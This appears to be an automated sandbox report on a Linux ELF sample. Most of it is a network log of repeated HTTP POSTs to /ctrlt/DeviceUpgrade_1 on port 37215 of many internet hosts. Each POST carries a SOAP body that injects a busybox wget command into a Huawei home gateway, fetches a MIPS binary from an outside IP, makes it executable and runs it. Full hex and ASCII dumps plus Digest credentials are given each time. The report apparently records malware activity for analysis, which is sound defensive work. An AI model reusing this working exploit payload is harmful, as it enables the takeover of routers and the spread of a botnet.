37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1170192.168.2.1360256197.19.205.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.004705906 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1171192.168.2.1348456156.87.191.16737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.008696079 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1172192.168.2.133675441.249.53.837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.013252974 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1173192.168.2.134672841.104.167.21737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.018023014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1174192.168.2.135453041.165.163.16637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.021718979 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1175192.168.2.1350184197.122.101.7037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.024847984 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1176192.168.2.1357560156.152.64.20337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.028373957 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1177192.168.2.1354652197.252.235.1537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.031318903 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1178192.168.2.1358064197.126.228.4337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.034344912 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1179192.168.2.134780041.221.174.12737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.036760092 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            System Behavior

                            Start time (UTC):13:37:57
                            Start date (UTC):10/06/2024
                            Path:/tmp/s8y4CBbFHW.elf
                            Arguments:/tmp/s8y4CBbFHW.elf
                            File size:4139976 bytes
                            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

